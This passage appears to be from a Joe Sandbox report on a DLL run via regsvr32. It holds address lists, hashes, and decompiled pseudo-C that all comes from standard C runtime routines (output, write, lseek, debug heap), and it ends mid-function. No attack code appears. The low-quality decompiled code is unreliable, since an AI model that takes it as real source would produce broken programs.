                                                                                0x7ffa5247ddd7
                                                                                0x7ffa5247dde8
                                                                                0x7ffa5247ddf7
                                                                                0x7ffa5247de01
                                                                                0x7ffa5247de0f
                                                                                0x7ffa5247de19
                                                                                0x7ffa5247de1f
                                                                                0x7ffa5247de32
                                                                                0x7ffa5247de40
                                                                                0x7ffa5247de4c
                                                                                0x7ffa5247de54
                                                                                0x7ffa5247de5d
                                                                                0x7ffa5247de61
                                                                                0x7ffa5247de6a
                                                                                0x7ffa5247de80
                                                                                0x7ffa5247de91
                                                                                0x7ffa5247de9f
                                                                                0x7ffa5247deab
                                                                                0x7ffa5247deb3
                                                                                0x7ffa5247dec6
                                                                                0x7ffa5247ded7
                                                                                0x7ffa5247dee5
                                                                                0x7ffa5247def1
                                                                                0x7ffa5247def9
                                                                                0x7ffa5247df09
                                                                                0x7ffa5247df19
                                                                                0x7ffa5247df29
                                                                                0x7ffa5247df39
                                                                                0x7ffa5247df49
                                                                                0x7ffa5247df59
                                                                                0x7ffa5247df5b
                                                                                0x7ffa5247df5d
                                                                                0x7ffa5247df68
                                                                                0x7ffa5247df6d
                                                                                0x7ffa5247df76
                                                                                0x7ffa5247df7a
                                                                                0x7ffa5247df80
                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-734865713
                                                                                • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                • Instruction ID: 70c51d4ae3b7b79733eb60a38398124edf76bc0d4944c22b15138d06a577e178
                                                                                • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                • Instruction Fuzzy Hash: AC412BA291C6C2C9E7708B14E8403BA76F0FB86345F488135D6AD87999DFBCE441DF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DD88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
				_t134 =  &_a1560;
				_a116 = E00007FFA7FFA52471E40(_t134);
				if (_a116 >= 0) goto 0x5247ddc2;
				_a116 = 0xffffffff;
				goto 0x5247dddb;
				_a116 = _t114 + _t134 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0x5247de66;
				if (_a1408 == 0x68) goto 0x5247df6f;
				if (_a1408 == 0x6c) goto 0x5247de24;
				if (_a1408 == 0x77) goto 0x5247df7c;
				goto 0x5247df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0x5247de61;
				_a80 = _a80 | 0x00000010;
				goto 0x5247df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
				goto 0x5247df6d;
				_a1216 = 0;
				goto E00007FFA7FFA5247DC41;
				goto 0x5247df88;
				_a80 = _a80 | 0x00000020;
				goto 0x5247df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}





                                                                                0x7ffa5247dd88
                                                                                0x7ffa5247dda0
                                                                                0x7ffa5247dda2
                                                                                0x7ffa5247ddaf
                                                                                0x7ffa5247ddb8
                                                                                0x7ffa5247ddba
                                                                                0x7ffa5247ddc2
                                                                                0x7ffa5247ddd7
                                                                                0x7ffa5247dde8
                                                                                0x7ffa5247ddf7
                                                                                0x7ffa5247de01
                                                                                0x7ffa5247de0f
                                                                                0x7ffa5247de19
                                                                                0x7ffa5247de1f
                                                                                0x7ffa5247de32
                                                                                0x7ffa5247de40
                                                                                0x7ffa5247de4c
                                                                                0x7ffa5247de54
                                                                                0x7ffa5247de5d
                                                                                0x7ffa5247de61
                                                                                0x7ffa5247de6a
                                                                                0x7ffa5247de80
                                                                                0x7ffa5247de91
                                                                                0x7ffa5247de9f
                                                                                0x7ffa5247deab
                                                                                0x7ffa5247deb3
                                                                                0x7ffa5247dec6
                                                                                0x7ffa5247ded7
                                                                                0x7ffa5247dee5
                                                                                0x7ffa5247def1
                                                                                0x7ffa5247def9
                                                                                0x7ffa5247df09
                                                                                0x7ffa5247df19
                                                                                0x7ffa5247df29
                                                                                0x7ffa5247df39
                                                                                0x7ffa5247df49
                                                                                0x7ffa5247df59
                                                                                0x7ffa5247df5b
                                                                                0x7ffa5247df5d
                                                                                0x7ffa5247df68
                                                                                0x7ffa5247df6d
                                                                                0x7ffa5247df76
                                                                                0x7ffa5247df7a
                                                                                0x7ffa5247df80
                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-734865713
                                                                                • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                • Instruction ID: 71856de9854016aa4d5bbb441c2321e0fdd684fed4783efde0f6592eab2c8fa5
                                                                                • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                • Instruction Fuzzy Hash: B3413AA291C6C2C9E7708B24E8403BA76F0FB86345F488135D6AD87599DFBCE441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BDDA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if (_a696 != 0x2a) goto 0x5247be16;
				_t134 =  &_a1112;
				_a116 = E00007FFA7FFA52471E40(_t134);
				if (_a116 >= 0) goto 0x5247be14;
				_a116 = 0xffffffff;
				goto 0x5247be2d;
				_a116 = _t114 + _t134 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0x5247beb7;
				if (_a972 == 0x68) goto 0x5247bfc0;
				if (_a972 == 0x6c) goto 0x5247be76;
				if (_a972 == 0x77) goto 0x5247bfcd;
				goto 0x5247bfd9;
				if ( *_a1096 != 0x6c) goto 0x5247bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0x5247beb2;
				_a80 = _a80 | 0x00000010;
				goto 0x5247bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0x5247bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 != 0x33) goto 0x5247bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 == 0x64) goto 0x5247bfac;
				if ( *_a1096 == 0x69) goto 0x5247bfac;
				if ( *_a1096 == 0x6f) goto 0x5247bfac;
				if ( *_a1096 == 0x75) goto 0x5247bfac;
				if ( *_a1096 == 0x78) goto 0x5247bfac;
				if ( *_a1096 != 0x58) goto 0x5247bfae;
				goto 0x5247bfbe;
				_a704 = 0;
				goto E00007FFA7FFA5247BB66;
				goto 0x5247bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0x5247bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0x5247ca31;
				goto __rax;
			}





                                                                                0x7ffa5247bdda
                                                                                0x7ffa5247bdf2
                                                                                0x7ffa5247bdf4
                                                                                0x7ffa5247be01
                                                                                0x7ffa5247be0a
                                                                                0x7ffa5247be0c
                                                                                0x7ffa5247be14
                                                                                0x7ffa5247be29
                                                                                0x7ffa5247be3a
                                                                                0x7ffa5247be49
                                                                                0x7ffa5247be53
                                                                                0x7ffa5247be61
                                                                                0x7ffa5247be6b
                                                                                0x7ffa5247be71
                                                                                0x7ffa5247be84
                                                                                0x7ffa5247be91
                                                                                0x7ffa5247be9d
                                                                                0x7ffa5247bea5
                                                                                0x7ffa5247beae
                                                                                0x7ffa5247beb2
                                                                                0x7ffa5247bebb
                                                                                0x7ffa5247bed1
                                                                                0x7ffa5247bee2
                                                                                0x7ffa5247bef0
                                                                                0x7ffa5247befc
                                                                                0x7ffa5247bf04
                                                                                0x7ffa5247bf17
                                                                                0x7ffa5247bf28
                                                                                0x7ffa5247bf36
                                                                                0x7ffa5247bf42
                                                                                0x7ffa5247bf4a
                                                                                0x7ffa5247bf5a
                                                                                0x7ffa5247bf6a
                                                                                0x7ffa5247bf7a
                                                                                0x7ffa5247bf8a
                                                                                0x7ffa5247bf9a
                                                                                0x7ffa5247bfaa
                                                                                0x7ffa5247bfac
                                                                                0x7ffa5247bfae
                                                                                0x7ffa5247bfb9
                                                                                0x7ffa5247bfbe
                                                                                0x7ffa5247bfc7
                                                                                0x7ffa5247bfcb
                                                                                0x7ffa5247bfd1
                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-192189897
                                                                                • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                • Instruction ID: 3faf77245274c6ae95f6320dee5e2acaf85e0577ffd06909a4f8489e20704f44
                                                                                • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                • Instruction Fuzzy Hash: CD414E6291C6C68AE7709B20E8543BE77F4EB86304F484135D6AD86A9EDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52479520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 00007FFA52479578
                                                                                • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 00007FFA52479563
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                • API String ID: 275287319-2412454244
                                                                                • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                • Instruction ID: bd5f9d88e1e7e2c2615a2b36019460bf31bf37452f277ea728f5b3000058011d
                                                                                • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                • Instruction Fuzzy Hash: 51315072628A9586D710CB24E88056E77B1FB867A0F548335E6BE47AEDCF7CE401CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52466210 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_unlock
                                                                                • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 2816345473-1282596470
                                                                                • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                • Instruction ID: cbc37eaa1383070161797423e07e8bb648d5dd99abffa2b1b45ae1562d6d9895
                                                                                • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                • Instruction Fuzzy Hash: EC31157292C6429AE3509B24EC4572A77F0FB46360F089134E66D8BAD9DBFCF4498F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52475393 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                                                • String ID: csm
                                                                                • API String ID: 933340387-1018135373
                                                                                • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                • Instruction ID: 129c8b431d493a9c3b2ba885d2887352e8771f001211cf207517ef87e8072bc6
                                                                                • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                • Instruction Fuzzy Hash: 5A21143290868182DA609F15E45036D77F0FBC2B55F589132EB9E4B7A9CFBDD442CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52480070 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _free_nolock$_unlock
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                                                • API String ID: 2500497606-1087415141
                                                                                • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                                • Instruction ID: df93fea09bf852844e919ef6a0af566b0c014063c3e1d5e4307c62a0bed9a222
                                                                                • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                                • Instruction Fuzzy Hash: 0C21F836639B8591E7409B15E890739A3F0FB86B90F58E435EA9E477A8CFBCD484C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52479694 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno_invalid_parameter
                                                                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 4140903211-23161695
                                                                                • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                • Instruction ID: c5e5f8a4752abdc13b6ecfa0fc9c2f861bdac0999d33e3b6a0ff83f776d85976
                                                                                • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                • Instruction Fuzzy Hash: 38115771A286469AE7509B20EC8036A33F1FB42744F98A235E26D02698DFFCE5458F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52479939 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno_invalid_parameter
                                                                                • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 4140903211-3042049227
                                                                                • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                • Instruction ID: 99504056d4af8ea14344323df643fe508dda6a642c8bcdf719dbbf2f4c872f68
                                                                                • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                • Instruction Fuzzy Hash: C8113971A0C64AAAF7209B20EC513BA63F0AB82354F988136D5AC066C9DFBCE545CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247976D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno_invalid_parameter
                                                                                • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 4140903211-1338331675
                                                                                • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                • Instruction ID: d97e811d2c66d47f348946a2d94f65ff130e5df080f6e893cbb954951b8ecc28
                                                                                • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                • Instruction Fuzzy Hash: BA014C71A18A46D6F7109B20EC8036937F0FB42354FA88135E66D076D9CFBCE545CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52479A9B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DecodePointer__doserrno_invalid_parameter
                                                                                • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                • API String ID: 1098298932-1795423647
                                                                                • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                • Instruction ID: 7221a7dbcdd280ebd4223e2a77645889807170e96cc48f512326ef5196731f48
                                                                                • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                • Instruction Fuzzy Hash: EAE0C961A1C94AA5F6619F21EC113BA26B1AF42B48F998232D16C0B2DADFBCA5058740
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247FF00 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E00007FFA7FFA5247FF00(intOrPtr __ecx, intOrPtr _a8) {
				signed int _v16;
				signed int _v20;
				signed int _v24;

				_a8 = __ecx;
				_v24 = 0;
				_v16 = 0;
				0x52469300();
				_v20 = 0;
				_v20 = _v20 + 1;
				if (_v20 -  *0x5248e520 >= 0) goto 0x52480042;
				if ( *((long long*)( *0x5248d500 + _v20 * 8)) == 0) goto 0x5248003d;
				if (( *( *((intOrPtr*)( *0x5248d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0x5248003d;
				E00007FFA7FFA5247AE90(_v20,  *((intOrPtr*)( *0x5248d500 + _v20 * 8)));
				if (( *( *((intOrPtr*)( *0x5248d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0x52480024;
				if (_a8 != 1) goto 0x5247ffe1;
				if (E00007FFA7FFA5247FD70( *((intOrPtr*)( *0x5248d500 + _v20 * 8))) == 0xffffffff) goto 0x5247ffdf;
				_v24 = _v24 + 1;
				goto 0x52480024;
				if (_a8 != 0) goto 0x52480024;
				if (( *( *((intOrPtr*)( *0x5248d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0x52480024;
